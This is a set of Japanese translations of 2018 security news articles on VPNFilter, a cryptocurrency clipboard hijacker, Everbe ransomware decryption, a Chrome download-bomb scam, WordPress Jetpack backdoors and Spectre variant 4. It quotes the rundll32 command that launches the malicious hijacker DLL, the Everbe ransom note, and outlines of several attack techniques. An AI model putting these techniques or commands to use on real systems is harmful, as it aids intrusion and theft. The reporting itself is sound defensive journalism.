     冬の間に、Malwarebytesの研究者達は、ユーザを、そのいかがわしいサイトにユーザを閉じ込めるための新しい「ダウンロード爆弾」を利用した技術サポート・スカム・キャンペーンに気が付いた
     このテクニックは、技術サポートサイト上でChromeブラウザをフリーズさせるために、数千のダウンロードを次から次へと開始するために、JavaScript Blobメソッドとwindow.navigator.msSaveOrOpenBlob関数を使用していた。


    フリーズしているChromeのユーザインタフェース(画像をクリックすると拡大します)

     Googleの開発陣は、このキャンペーンに気が付き、Chrome 65.0.3325.70でこの問題を修正した。
     しかし、この問題のオリジナル・バグレポートでの応答によると、この問題は6月12日にリリースされたGoogle Chrome 67.0.3396.87で復活した。
     「このバグは、67.0.3396.87で再び回帰させられた」と、この問題を見つけた、このユーザは発言している。「(私は)、私のブラウザをフリーズさせるスカム・サイトへの悪意あるリダイレクトによって、この問題を偶々見つけた」と彼は続けている。
     他のユーザも、最新のChromeが再びダウンロード爆弾に感染しやすくなっているとする彼の発見を確認している。

    ダウンロード爆弾テクニックはまた、他のブラウザにも影響を与える

     しかし、この問題は当初考えられていたより広がりを見せてきている。2月に、この問題を最初に解析したMalwarebytesのセキュリティエキスパートJerome Seguraは、Firefoxも影響を受けることを指摘していた。
    Bleeping Computerは、他のブラウザをテストするために今迄のChromeFirefox用の概念の実証(proof-of-concept、PoC)を使用した。我々のテストによると、BraveとVivaldiも、この概念の実証(proof-of-concept、PoC)を稼働した時フリーズした。
     Operaも短時間フリーズしたが、最終的に我々は、PoCタブから切り替えることが可能だった。けれども、継続的なダウンロードがバックグラウンドで依然として発生していたので、我々は、このブラウザを閉じるためにWindows Task Managerを使用する必要があった。
     我々のテストは、Microsoft EdgeとInternet Explorerが影響を受けないことを明らかにした。
     あなたが、このトリックを使用している技術サポートサイトに到着し、あなたのブラウザが最後にアクセスしたサイトを開くように設定されているのであれば、ダウンロード爆弾が開始される前に、技術サポートサイトのタブを閉じることが可能である。
     これは、技術サポート・スカムWebサイトが、完全にページをロードした後に、ダウンロード爆弾コードをロードするためである。このため、ユーザは、ブラウザUIがフリーズするまでの数秒が与えられているので、この間に、そのタブを閉じることができる。


    Dr Symantecは、ルータ上のVPNFilterの脅威に関する手っ取り早くて簡単なチェックを提供している
    The Register : Security (2018/07/02)
     VPNFilterマルウェアに対応するためのクリーンアップの努力はフリーの診断ツールのリリースで加速された。
     Symantecのユーティリティは、感染を確認するのではなく、トラフィックが操作されているか否かを確認するだけのものであるが、それにも拘わらず、サードパーティの専門家は、そのリリースを歓迎している。  5月にCisco Talosのセキュリティ研究者によって発見されたVPNFilterは、ルータ、NASデバイスのような50万ものIoTデバイスをハイジャックしていると見積もられている。
     このマルウェアは企業と個人用のルータに感染し、暗号化されたWebとトラフィックをスヌーピングし、彼らに遠隔制御を可能にするために、改竄されたデバイス上にバックドアを確立する能力がある。どのような厄介な物で、デバイスが感染させられるのかは、ファームウェアやモデルに依存する。そして、装置のファームウェアの既知の脆弱性や、インターネットに開放されたままになっているリモート管理のような、弱いセキュリティ設定が悪用されていると考えられている。影響を受けるルータの完全なリストは、こちらのSymantecのサイトを閲覧しなさい。
     VPNFilterは、モニターするプラグインをインストールし、感染したルータを介して送信されるWebトラフィックを改竄する。これは、サイバー犯罪者が悪意あるコンテンツを挿入し、ルータを操作不能にしたり、パスワードや他の重要なユーザ情報を盗むことを可能にするためである。このボットネットはまた、簡単に強力なDDoSツールに変換されるので、インターネット衛生上の観点から、広汎な、明白かつ眼前の脅威である。
     別のIoTボットネットであるMiraiは、2016年10月に遡るが、その悪名高い攻撃でDNSサービス企業Dynをブロックする攻撃を乱用し、多くの著名なWebサイトをアクセス不能なままにした。
     Symantecは、VPNFilter Checkを開発した。このツールは個人と組織を支援する無料のオンラインツールであり、彼らのルータが、VPNFilterマルウェアによって改竄されているか否か即座に決定することができるものである。
     より正確には、VPNFilter Checkは、家庭もしくは企業のネットワークが、感染させられているルータによって変更されたか否かを突き止めるツールである。
     「このマルウェアは、他の殆どのIoT脅威と異なり、再起動した後でさえ、感染したデバイス上に永続的存在を維持する能力をがある」と、「SymantecのオンラインVPNFilter Checkツールは、家庭もしくは企業のルータが、この脅威で改竄されているか否かを決定する簡単な方法を、彼らに提供するものである」と、Stephen Trilling(Symantecの上席副社長兼セキュリティ解析研究部門本部長)は発言している。
     アンチウィルス産業で経験豊かなVesselin Bontchevは、このツールは、IoTデバイスが感染しているか否かの確認を提供するのではなく、VPNFilterが、接続を妨害しているか否かを検出するものであると、The Registerに告げている。
     「このツールは、一般的にルータ中のVPNFilterを検出するのではなく、何かがHTTPS接続を妨害しているか否かを検出するだけのものである」と、Bontchevは説明している
     「VPNFilterの一つのコンポーネント(常駐していない)が、HTTPS接続の妨害を実行することができる。そのコンポーネントが、そこに存在し、且つ、アクティブであるなら、そのコンポーネントが実行するHTTPSのHTTPへのダウングレードは、検出されるだろう。」


    クリップボード・ハイジャッカー・マルウェアは、230万Bitcoinアドレスを監視している
    BleepingComputer : News>Security (2018/06/30)
     仮想通貨は、ここ数年で急激な成長を見せているが、依然として仮想通貨を送信することは、ユーザに長くてとても覚えきれないようなアドレスをコインの送信に要求している。これに起因して、仮想通貨を送信するとき、多くのユーザは、或るアプリケーションからメモリにそのアドレスをコピーし、彼らがコインを送信するために使用する別のアプリケーションに、それをペーストしている。
     攻撃者は、ユーザがアドレスをコピー・アンド・ペーストしていることを認識しているので、これを悪用するマルウェアを作成した。CryptoCurrency Clipboard Hijackersと呼ばれるこの種のマルウェアは、仮想通貨のアドレスに関してWindowsクリップボードを監視する。そして、仮想通貨のアドレスが検出されたなら、そのアドレスを彼らがコントロールしているアドレスと入れ替える。ユーザが、それをペーストした後、そのアドレスを二重チェックした場合を除き、送信されたコインは、所定の受け手の代わりに攻撃者のコントロール下にあるアドレスに送られるだろう。
     我々は、過去に仮想通貨クリップボード・ハイジャッカーについて記述しており、それは新しいものではないが、今までのサンプルの殆どは、40万から60万の仮想通貨アドレスを監視していた。今週、BleepingComputerは、230万もの仮想通貨アドレスを監視しているこの種のマルウェアに気が付いた。


    マルウェアによって監視されている230万の仮想通貨アドレス

     このマルウェアが、Windowsクリップボード中に発見した仮想通貨アドレスを置き換える方法を示すために、我々は、こちらにビデオを作成した。
     このビデオで、あなたは、このマルウェアが、Windowsクリップボードにコピーされた仮想通貨アドレスを取得し、それを、彼らがコントロールしている別のアドレスに置き換える方法を見ることができる。ユーザがペーストしたアドレスを二重チェックした場合を除き、ユーザは、このような置き換えが行われていることが全く分からないだろう。

    感染の仕組み

     この感染は、今週拡散していたAll-Radio 4.27 Portableマルウェア・パッケージの構成部分として見つけられた。インストールされるとき、d3dx11_31.dllという名前のDLLが、WindowsのTempフォルダにダウンロードされ、ユーザがコンピュータにログインした時、"DirectX 11"と呼ばれるAutorunが、このDLLを稼働するために作成される。
     このDLLは、"rundll32 C:\Users\[user-name]\AppData\Local\Temp\d3dx11_31.dll,includes_func_runnded"コマンド付きで、rundll32.exeを使用して実行される。


    この感染を起動しているRundll32.exe

    クリップボード・ハイジャッカーから自身を保護するには

     このようなマルウェアは、バックグラウンドで実行され、稼働している兆候を示さないので、感染していることを見つけるのは簡単ではない。それ故、この種の脅威から自身を保護するためには、インストールされているアンチウィルス ソフトを常にアップデートしておくことが重要である。
     実際に仮想通貨を送信する前に、全ての仮想通貨ユーザは、仮想通貨を送信しようとしているアドレスを二重チェックすることが重要である。こうすることで、アドレスが意図したアドレス以外のアドレスに置き換えられているか否かを確認できる。


    Windows Defenderは、正当なファイルをTrojan:Win32/Bluteal.B!rfnとして検出している
    BleepingComputer : News>Security (2018/06/27)
     最近、Windows Defenderが、突然ファイルをTrojan:Win32/Bluteal.B!rfnとして検出したとする多くの報告があった。検出されたファイルはCPUマイナーから正当なWindowsファイルにまで及んでいる。
     例えば、6月24日に、我々のフォーラムへの訪問者の一人は、このフォーラムにWindows Defenderが、正当なファイルである C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#
    \daf01e12fa59ed340363c44b7deff15e\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dll をTrojan:Win32/Bluteal.B!rfn として検出したと投稿した。


    Trojan:Win32/Bluteal.B!rfnの誤検出

    MicrosoftのWindows Defender Security Intelligenceサイトのページによると、Trojan:Win32/Bluteal.B!rfnの検出は、2018年5月18日頃に追加されたようである。これはヒューリスティック定義のようであるが、その説明は、「この脅威は、あなたのPC上で悪意あるハッカーの選択した幾つかのアクションを実行する」という漠然としたものである。
     類似のケースを検索している時、私は多くの他のプログラムレポート(5月末からWindows DLLがBluTealとして検出される)を発見した。例えば、2日前から、あるReddit(【訳註】 アメリカ最大級のソーシャルニュースサイト、掲示板(ニコニコ大百科より))スレッドでは、様々なユーザが多くのWindows 10 1803上で同じ挙動を報告していることが示されている。


    画像をクリックすると拡大します

    Blutealとして検出されるプログラムやファイルの簡単なリストは以下を含んでいる。

    C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#
    \daf01e12fa59ed340363c44b7deff15e\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dll
    C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vde5ed89a#
    \457b4a4c20bed2246e03f1f9e5eaa1a5\Microsoft.VisualStudio.Utilities.Internal.ni.dll
    ArchieSteamFarm.dll
    SPCB.exe (SharePoint Client Browser)
    Oracle_VM_VirtualBox_Extension_Pack-5.2.12.vbox-extpack
    AutoHotkey
    mtrand.so

    Microsoftは、これが誤検出であることを認めている

     この件に関してMicrosoftに接触した後、私は、この検出が誤検出であること、この問題は既に解決していると告げられたが、どの定義ファイルがアップデートされたのか、いつ解決されたのかについては告げられていない。
     定義ファイルのバージョン 1.271.37.0 によると、この定義は、昨日(6月26日、このアップデートがリストされているので)解決されたようである。
     依然として、この誤検出が見られるのであれば、あなたは、Windows Defenderの新しいアップデートをチェックし、アップデートをインストールしなさい。
     新しいアップデートをチェックするには、設定 > 更新とセキュリティ > Windows Update に進み、更新の確認を選択する。新しいWindows Defender定義ファイルが利用可能であれば、"Definition Update for Windows Defender"としてリストされている。


    Everbe身代金要求型マルウェア用の復号ツールがリリースされた
    BleepingComputer : News>Security (2018/06/14)
     Everbe身代金要求型マルウェア用の復号ツールは、Michael GillespieMaxime Meignanによってリリースされた。このツールは、犠牲者が彼らのファイルを無料で取り戻すことを可能にするものである。この身代金要求型マルウェアは、現在どのようにして拡散しているのか分かっていないが、犠牲者は、暗号化されたファイルの暗号化されていないバージョンを持っている限り、復号キーをブルートフォースで見つけるためにそれらを使用することができる。
     犠牲者が感染した時、彼らのファイルは暗号化され、.[everbe@airmail.cc].everbe, .embrace, あるいは .pain拡張子が暗号化されたファイル名に追加される。


    Everbe身代金要求型マルウェアによって暗号化されたファイル

     暗号化されたファイルのある各フォルダに、この身代金要求型マルウェアは、!=How_recovery_files=!.txtと名付けられた脅迫文を作成する。これは支払い情報に関して everbe@airmail.cc にメールするよう犠牲者に指示している。


    Everbe身代金要求型マルウェアの脅迫文

     Everbe身代金要求型マルウェアに感染し、暗号化されたファイルを持っている人々は、以下のガイドを使用して、無料でファイルを復号することができる。あなたがファイルの復号に支援を必要とするのであれば、遠慮無くEverbe Ransomware Help Topicで質問しなさい。

    Everbe身代金要求型マルウェアの復号方法

     Everbe身代金要求型マルウェアの犠牲者は、暗号化され、.everbe, .pain, もしくは .embrace拡張子にリネームされているたファイルを持っていることで特定することができる。Everbe身代金要求型マルウェアによって暗号化されたファイルを復号するには、先ず、以下のInsaneCrypt Decryptorをダウンロードする必要がある。このツールは、Everbeもサポートしている。

    InsaneCrypt Decryptorのダウンロード(直リンク)

     ダウンロードしたら、この復号ツールを起動するために実行ファイルをダブルクリックする。あなたはメインスクリーンを表示されるだろう。


    復号ツールのメインスクリーン

     復号キーをブルートフォースで見つけるために、我々は、暗号化されたファイルとオリジナルの暗号化されていないファイルの両方を必要とする。この二つを持っているなら、SettingメニューをクリックしBruteforcerを選択しなさい。これは、以下に示したように、暗号化されたファイルと暗号化されていないバージョンの両方を選択するように要求してくる。


    ブルートフォース用のファイル選択画面

     両方のファイルを選択したら、ブルートフォースで復号キーを見つけるためにStartボタンをクリックする。このプロセスは、かなり時間がかかるので、辛抱強く待ちなさい。


    ブルートフォース中の画面

     終了すると、この復号ツールは、復号キーが発見されたと伝えてくるので、右上の X ボタンを押してBruteForcerウィンドウを閉じる。そこで、以下に示したように、復号キーが、この復号ツール中にロードされる。


    ロードされた復号キー

     我々は今、復号するディレクトリを選択する必要がある。あなたがドライブ全体を復号したいのであれば、ドライブレター自体を選択しなさい。例えば、以下の画像で、あなたは、C:\ ドライブが選択されているのを確認できる。


    ドライブが選択されている

     準備ができたら、Everbeで暗号化されたファイルの復号を開始するために、Decryptボタンをクリックする。Decryptボタンをクリックすると、このプログラムは暗号化されている全てのファイルを復号し、そのウィンドウ中に復号状況を表示する。


    ファイルの復号中

     終了したら、この復号ツールは復号されたファイルの総数を表示する。ファイルの一部がスキップされているのであれば、そのファイルのパーミッションに起因しているかもしれない。


    復号終了

     これで、あなたのファイルは復号されたが、暗号化されたファイルそのものは、依然としてコンピュータ上に存在している。あなたのファイルが適切に復号されていることを確認したら、暗号化されたファイル全てを一つのフォルダに移動させるためにCryptoSearchを使用しなさい。そこで、あなたは、それらを削除したりアーカイブしたりすることができる。
     今、この復号ツールを終了し、通常通りコンピュータを使用することができる。あなたが、この復号ツールの使用に関して支援を必要とするのであれば、我々の、Everbe Ransomware Help Topic で質問しなさい。

    脅迫文

    Hi !
    If you want restore your files write on email - everbe@airmail.cc
    In the subject write - id-de9bcb


    VPNFilterは、ASUS, D-Link, Huawei, Ubiquiti, UPVEL, ZTEにも感染することができる
    BleepingComputer : News>Security (2018/06/06)
     過去数ヶ月で54カ国、50万を超えるルータとNASデバイスに感染したVPNFilterマルウェアは、今まで思われていたよりずっと酷いものである。
     Cisco Talosセキュリティチームによって本日公開された新たな技術的詳細によると、当初、Linksys, MikroTik, Netgear, TP-Link, QNAPのデバイスに感染すると考えられていたこのマルウェアは、ASUS, D-Link, Huawei, Ubiquiti, UPVEL, ZTEによって製造されたルータにも感染することができる。
     VPNFilterに対して脆弱性のあるデバイスのリストは、Ciscoのオリジナルのレーポートから急増している(16のデバイスモデルから71に、ことによると、もっと多く)。完全なリストは、この記事の末尾に提示している。

    新たなVPNFilterプラグイン

     更に、研究者は、このマルウェアの三段階開発システムの一部としての第三段階のプラグインとしてパックされた新たなVPNFilterの能力を発見した。


    VPNFilter構造

    Ciscoの専門家は、彼らが以下の二つの新しい第三段階プラグインを発見したと発言した。

    ssler - 中間者攻撃を介してポート80のWebトラフィックをインターセプトし改竄するためのプラグイン。このプラグインはHTTPSをHTTPにダウングレードすることをサポートしている。
    dstr - デバイスのファームウェア・ファイルを上書きするプラグイン。Ciscoが既知のVPNFilterは、デバイスのファームウェアを削除することができた。彼らの最近のレポートでは、この具体的な第三段階プラグインに対する機能を指摘している。

     これら二つの新しいプラグインは二つの既知のものに追加されている。

    ps - ネットワークパケットを盗聴し、特定の種類のネットワークトラフィックを検出するプラグイン。Ciscoはこのプラグインが、しばしば、工業用ソフトウェアやSCADA機器によって使用されるModbus TCP/IPパケットを探すために使用されていると確信しているが、大多数の最近のレポートでは、このプラグインが、TP-Link R600仮想プライベートネットワークに接続されている工業用機器も探していると主張している。
    tor - Torネットワークを介してコマンド&コントロールサーバと通信するためにVPNFilterボットによって使用されるプラグイン。

     一般的な、VPNFilterマルウェアに関する技術的詳細は、Ciscoの最初のレポートに存在している。ssler, dstr, ps第三段階プラグインに関する詳細は、本日公開されたレポートに存在している。
     VPNFilterボットネットは、世界中のデバイスに感染したことで発見されたが、研究者は、このボットネットが、ウクライナのITインフラストラクチャへのサイバー攻撃を準備している時に、その発見を公開した。このサイバー攻撃は、5月末ウクライナのキエフで行われるUEFAチャンピオンリーグサッカーの決勝の日に起こると、多くの人は信じている。
     コマンド&コントロールサーバを乗っ取ることで、このボットネットを無力化するためにFBIが介入した。それにも拘わらず、ロシア軍の一部隊と信じられているこのマルウェアの背後にいるグループは、ウクライナのネットワーク上の感染したデバイスへの注視を継続するために、最近新しいボットネットをアッセンブルすることを始めた。
     以下にVPNFilterマルウェアによって標的にされているルータとNASデバイスのアップデートされたリストを掲げておく。Ciscoは先月、VPNFilterはデバイスに感染するために0-Dayの脆弱性を使用していないと発言した。これは、リストされているモデルは、リリースされている古いファームウェアに対する攻撃に脆弱であることを、そして、最新のファームウェアにアップデートすることは、そのデバイスを、このマルウェアが到達できない場所に保持することを意味している。
     ユーザが、ルータのファームウェアをアップデートできず、新しいルータにもアップデートできないが、デバイスからこのマルウェアを削除したいのであれば、このマルウェアを安全に削除するための手順は、この記事において示されている。感染したデバイスからVPNFilterを削除することは、このマルウェアが、SOHOルータとIoTデバイスに関してブート・パーシステンスを達成することのできる二つのマルウェア株の一つなので、相当困難なことである。更に、ルータがこのマルウェアに感染した目に見える兆候は、あなたがルータのファームウェアをスキャンした場合を除いて存在しないし、あなたが感染を認識した場合でさえ困難である。我々が現時点で与えることのできる最良のアドバイスは、間違いなくアップデートしたファームウェアでルータを稼働することである。

    Asus:
    RT-AC66U (new)
    RT-N10 (new)
    RT-N10E (new)
    RT-N10U (new)
    RT-N56U (new)
    RT-N66U (new)

    D-Link:
    DES-1210-08P (new)
    DIR-300 (new)
    DIR-300A (new)
    DSR-250N (new)
    DSR-500N (new)
    DSR-1000 (new)
    DSR-1000N (new)

    Huawei:
    HG8245 (new)

    Linksys:
    E1200
    E2500
    E3000 (new)
    E3200 (new)
    E4200 (new)
    RV082 (new)
    WRVS4400N

    Mikrotik:(バグはRouterOSバージョン6.38.5で修正された)
    CCR1009 (new)
    CCR1016
    CCR1036
    CCR1072
    CRS109 (new)
    CRS112 (new)
    CRS125 (new)
    RB411 (new)
    RB450 (new)
    RB750 (new)
    RB911 (new)
    RB921 (new)
    RB941 (new)
    RB951 (new)
    RB952 (new)
    RB960 (new)
    RB962 (new)
    RB1100 (new)
    RB1200 (new)
    RB2011 (new)
    RB3011 (new)
    RB Groove (new)
    RB Omnitik (new)
    STX5 (new)

    Netgear:
    DG834 (new)
    DGN1000 (new)
    DGN2200
    DGN3500 (new)
    FVS318N (new)
    MBRN3000 (new)
    R6400
    R7000
    R8000
    WNR1000
    WNR2000
    WNR2200 (new)
    WNR4000 (new)
    WNDR3700 (new)
    WNDR4000 (new)
    WNDR4300 (new)
    WNDR4300-TN (new)
    UTM50 (new)

    QNAP:
    TS251
    TS439 Pro
    QTSソフトウェアを実行している他のQNAP NASデバイス

    TP-Link:
    R600VPN
    TL-WR741ND (new)
    TL-WR841N (new)

    Ubiquiti:
    NSM2 (new)
    PBE M5 (new)

    UPVEL:
    型番不明(new)

    ZTE:
    ZXHN H108N (new)


    ハッカーは、WordPressサイトにバックドア化されたプラグインをインストールする新しい方法を発見している
    BleepingComputer : News>Security (2018/05/23)
     ハッカーは、オープンソースWordPress CMSを実行しているWebサイトにバックドア化されたプラグインをインストールする今まで確認されていない方法を見つけ出した。この新しいテクニックは、弱い保護下にあるWordPress.comアカウントとJetpackプラグインの使用に依存している。
     このテクニックは大変複雑であり、サイトをセキュリティ侵害するためには、ハッカーは、複数の物が攻撃の成功を妨げるので、様々なステップを踏まなければならない。
     それであるにも拘わらず、WordPressサイト・セキュリティ企業Wordfenceからのレポートと、サイバー犯罪者によってハイジャックされたサイトオーナーからの公式のWordPress.orgフォーラムへの幾つかの投稿によると、攻撃は5月16日から発生している。

    攻撃の動作方法

     この攻撃の最初のステップは、ハッカーが公に晒されたユーザ名とパスワードを取得し、WordPress.comアカウントへのログインを企てることで構成される。
     複数のアカウントでパスワードを使いまわし、プロファイルに関して二要素認証を有効にしていないユーザは、彼らのアカウントを乗っ取られる余地がある。
     明確化のために言うと、WordPress.comアカウントはAutomaticによってホストされている専用のブログを管理するために使用されているものであり、WordPress.orgやオープンソースベースのセルフホスト型WordPressの管理者アカウントとは異なるものである。
     WordPressオープンソースCMSは、WordPressコミュニティーによって管理されているが、多くのAutomatic開発者が、このオープンソース・プロジェクトに貢献し、常に、大きな影響を与え、このオープンソースCMSと緊密に結びついている。これが、数年前にAutomaticがWordPress.comで使用されていた解析プラグインを採用し、これをセルフホスト型WordPressサイト用のオープンソースプラグインとしてリリースした理由である。

    ハッカーはJetpackを介してバックドア化されたプラグインをインストールする

     このJetpacと名付けられた解析モジュールは、多くの新しい機能で成長し、今や、WordPressサイトにおいて最も人気のあるプラグインの一つである。
     このプラグインの機能の一つが、セルフホスト型WordPressサイトをWordPress.comアカウントに接続させ、各サイトにインストールされたJetpacプラグインを介して、数十もしくは数千のセルフホスト型WordPressを管理するためにWordPress.comダッシュボードの内部でJetpackパネルを使用する能力である。
     Jetpackが提供しているオプションの一つは、WordPress.comのJetpackダッシュボードから異なるサイトにプラグインをインストールする能力である。
     このプラグインは、公式のWordPress.orgレポジトリ上にホストしたり非表示にしたりするまでもなく、攻撃者は、悪意あるコードを含むZIPファイルを簡単にアップロードし、次に、各サイトに送信することができる。

    Jetpacプラグイン

     Wordfenceによると、WordPress.comアカウントを乗っ取り、リンクされたセルフホスト型WordPressサイトを発見したハッカーは、これまで安全であったサイトにバックドア化されたプラグインを配備するために、このリモート管理機能を乱用している。

    ハッキングは一週間発生している

     エキスパートは、攻撃者が、"pluginsamonsters"(その後の5月21日に"wpsmilepack"と別の名前に変更された)と名付けられたプラグインを配備することを5月16日に開始したと発言している。
     セキュリティ侵害された数は不明であり、セキュリティ侵害されたサイトを検出することもまた困難である。
     「このプラグインは、WordPress.comダッシュボードでは表示されるが、アクティブな時、ターゲットのWordPressサイトのプラグインリストでは非表示である」と、Wordfenceチームは発言している。
     今のところ、ハッカーは、スパムや技術サポートスカムにユーザをリダイレクトするために、これらのバックドアを使用している。
     WordPress.comアカウントにJetpackプラグインを接続しているセルフホストサイトのオーナーは、WordPress.comダッシュボード内部で、セルフホストされたサイトに配備されたこのプラグインを検証するように促されている。
     疑わしいプラグインが見つかった場合、即座にWordPress.comのアカウントパスワードを変更し、そのアカウントに二要素認証を有効にし、サイトクリーニング・プロシージャを起動しなさい。
     Wordfenceは、この新しいサイトハイジャック・テクニックの背後で脅威を与えている者共は、今までセルフホストされたWordPressサイトをターゲットにしてきたと、発言している。今年2月、彼らは、管理者アカウントの認証を推測し、直接、源でセルフホストされたWordPressサイトをハイジャックしようとして、"credential stuffing"(リークされたユーザ名とパスワードの組み合わせを使用すること)と呼ばれるテクニックを使用していた。


    GoogleとMicrosoftは、新たなSpectre攻撃を公開した
    BleepingComputer : News>Security (2018/05/21)
     GoogleとMicrosoftのセキュリティ研究者は、AMD, ARM, IBM, Intelによって製造されたプロセッサが影響を受けるSpectre攻撃の新たな二つの変種を発見した。
     この新しいフローに関する噂は、今月初めドイツの雑誌で、オンラインにリークされていたが、事実に基づく詳細に関しては、本日公開された。
     AMD, ARM, IBM, Intel, Microsoft, Red Hat, Ubuntuは、記述の時点でセキュリティ・アドバイザリを公開している(緩和策と共に、このバグの動作方法の説明を含む)。

    StectreNGとして知られているバグ

     過去数週間SpectreNGと呼ばれてきたこのバグは、昨年発見され2018年の初めにアナウンスされた、以前のMeltdownとSpectreのバグに関連している。
     GoogleとMicrosoftの研究者は個々にこのバグを発見した。このバグは、MeltdownとSpectreのバグと類似した動作をする。これが、この脆弱性に完全に別の名前を与えるのではなく"variant 3a"、"variant 4"として分類された理由である。

    Variant 1: 境界チェックのバイパス(CVE-2017-5753)。別名、Spectre v1
    Variant 2: 分岐ターゲットのインジェクション(CVE-2017-5715)。別名、Spectre v2
    Variant 3: 不正なデータ キャッシュの読み込み(CVE-2017-5754)。 別名、Meltdown
    Variant 3a: 不正なシステムレジスタの読み込み(CVE-2018-3640)
    Variant 4: 投機的ストアバイパス(CVE-2018-3639)

    Variant 3aは、Meltdownフローの亜種であるが、Variant 4は、新たなSpectre様の攻撃である。これら二つの内で重要なものは、Variant 4である。この二つのバグは同じ理由、即ち、投機的実行(全ての最先端のCPU中に見出される機能で、条件分岐の先を予め実行し、後で不必要なデータを廃棄することによってパフォーマンスを改善する役割も持っている)で発生する。
     違いは、Variant 4が投機的実行プロセスの様々な部分(CPUの内部にあるStore Bufferの内部データ)に影響を与えることである。Red Hatは、このバグが最新のCPUに影響を与える方法の説明ビデオをYouTubeで公開している。
     Red Hatは、これをより技術的に分類したので、この脆弱性は...

     ...特権化されたコード中に正確に定義された命令シーケンスの存在に依存している、並びに、メモリは、最新のメモリ書き込みが起こったアドレスから読み込むという事実は、古い値を閲覧し、続いて、投機的実行が実際には委任していない命令でさえ、アップデートをマイクロプロセッサのデータキャッシュに発生させるかもしれない。

     「この脆弱性の悪用に成功した攻撃者は、信頼境界線を越えて特権化されたデータを読み込むことが可能になる」と、Microsoftは類似のアドバイザリで発言し、このフローがSandbox化された環境から抜け出すために使用することができるとするRed Hatのアセスメントを確認している。Microsoftはまた、Variant 4バグに関する詳細なブログ(6:23 AM - May 22, 2018のツイート)を公開している。
     GoogleのJann Hornもまた、proof-of-concept(概念の実証)コードを公開している。
     IntelとAMD x86チップセットとPOWER 8, POWER 9, System z、およびARM CPUは、影響を受けることが知られている。Intelはセキュリティアドバイザリにおいて、影響を受けるCPUシリーズの詳細なリストを公開した。
     Variant 4は、ブラウザ中のJavaScriptコードを介して遠隔から悪用することが可能である。けれども、Microsoftは、如何なる悪用の企ても検出されていないと発言している。

    追加のパッチがリリースされている

     Leslie Culbertson(Intelの執行副社長兼製品保証&セキュリティ本部長)は、2018年1月からのオリジナルのMeltdownとSpectreのパッチは、同様にVariant 4を緩和するのに十分なものであると発言している。
     それでもなお、Intelは、新しいパッチをアナウンスした。
     「我々は既に、OEMシステム・メーカーとシステム・ソフトウェア・ベンダにベータ版でVariant 4に関するマイクロコードアップデートを配布した。我々は数週間以内にBIOSとソフトウェアアップデートがリリースされるだろうと予期している。」 更に、「この緩和策は、顧客が有効にするか否かを選択するoff-by-default(DefaultではOFF)に設定されるだろう」と、Culbertsonは発言している。
     「この設定で、我々はパフォーマンスに影響がないことを観察している。有効にした場合は、凡そ2から8%パフォーマンスに影響が出ることを観察した」と、Culbertsonは追加している。AMDもまた、ホワイトペーパーにおいて、Variant 4緩和策を無効にしたままにすることを推奨している。
     Red HatとMicrosoftは、同様に新しいパッチをアナウンスした(緩和策のアドバイスに関するセキュリティアドバイザリへのリンクを参照)。Ciscoは、彼らのデバイスは影響を受けないと発言している。


    Windows 10の4月のアップデートのロールアウトが、Intelと東芝のSSD搭載デバイスに関して停止された
    BleepingComputer : News>Security (2018/05/16)
     Microsoftは、特定の種類のIntelと東芝のSSD(ソリッド・ステート・ドライブ)を使用しているコンピュータに対して、Windows 10 の2018年4月のアップデートの提供を停止した。
     Microsoftは、2018年4月のWindows 10アップデートが、以下を使用しているデバイスに関して適切に動作しないという複数のユーザのレポートに従う形でこの決定をした。

    Intel SSD 600p Series
    Intel SSD Pro 6000p Series
    Toshiba XG4 Series
    Toshiba XG5 Series
    Toshiba BG3 Series

    Intelと東芝の問題は別々であるかのようである。より具体的には、Intel SSDを使用しているWindows PCは、頻繁にクラッシュし、再起動した後、UEFI(【訳註】 Unified Extensible Firmware Interface、BIOSに代わる仕様)画面になる。他方、東芝SSDのユーザは、バッテリの短命化やSSDドライブが非常に熱くなると報告している。
     両方共、Microsoftは、これらSSDのユーザは、Windowsの以前のバージョン(Fall Creators Update)に戻すか、ユーザがダウングレードすることができるWindows設定パネルにアクセスできない場合では、OS全体を再インストールすることを推奨している。
     奇妙なのは、このIntelのシリーズは、通常、Surface Proラップトップの一部に搭載されているSSDである。これは、Microsoftが、独自の自国産デバイスに関して、2018年4月のアップデートの徹底的な検証に失敗したことを意味している。
     二つのサポートトピック(1, 2)において、Microsoftは、影響を受ける可能性のある全てのデバイスを特定し、2018年4月のアップデートをインストールさせないようにするために、OEMプロバイダ、Intel、東芝と共同で作業していると発言している。
     Microsoftは、Intel SSD問題を修正する予定期日を提供していないが、東芝SSDを使用しているデバイスに関する解決策は6月初旬を予定していると発言している。


    PDFが、あなたのPCをグチャグチャにする方法はどれだけあるのだろうか? 今回のAdobe アップデートだけで47
    The Register : Security (2018/05/14)
     Adobeが、Acrobat, Reader, Photoshop用のセキュリティアップデートをポストした。それらの多くは緊急のフロ ーである。
     Adobeは、AcrobatとReaderのアップデートが、CVEにリストされている全47の脆弱性(2ダースに及ぶPDFリーダー中のリモートコード実行のフローを含む)を解決すると発言している。Adobeは、このバグの何れも未だ活発な標的になってはいないと言及している。
     これら47のCVEの内、13は、Use-After-Free(【訳註】 一度解放したメモリブロックを再度使ってしまうバグ)リモートコード実行のバグであり、別の7つは、ヒープオーバーフロー・エラーを介してリモートコード実行を可能にするものである。残りのリモートコード実行の脆弱性は、double free error (CVE-2018-4990、【訳註】 アプリケーション中で通常発見される多くの一般的なメモリ損壊の内の一つ、Double Freeエラーは、同じメモリの場所を二回解放することによって発生する)、out-of-bounds write error (CVE-2018-4950、【訳註】 領域外メモリへの書き出し)、type confusion error (CVE-2018-4953、【訳註】 型の混同によりリモート攻撃者がシステム上で任意のコードを実行できる(IBMサポートより))、untrusted pointer dereference (CVE-2018-4987、【訳註】 不正確なポインタ計算、不完全な初期化やメモリ解放による不正なポインタへのアクセス(JVN iPediaより))である。
     今回修正された全脆弱性の内、19のパッチされたフローは、境界外読み込みエラーを介しての情報漏洩のバグであり、別の二つ(CVE-2018-4994, CVE-2018-4979)は、セキュリティバイパス脆弱性と説明されている。他の二つの情報漏洩のフローは、NTLM SSO hash theft (CVE-2018-4993、【訳註】 WindowsのパスワードのNTLMハッシュをリモートから窃取できる脆弱性(マイナビニュースより))とメモリ損壊 (CVE-2018-4965)のエラーである。
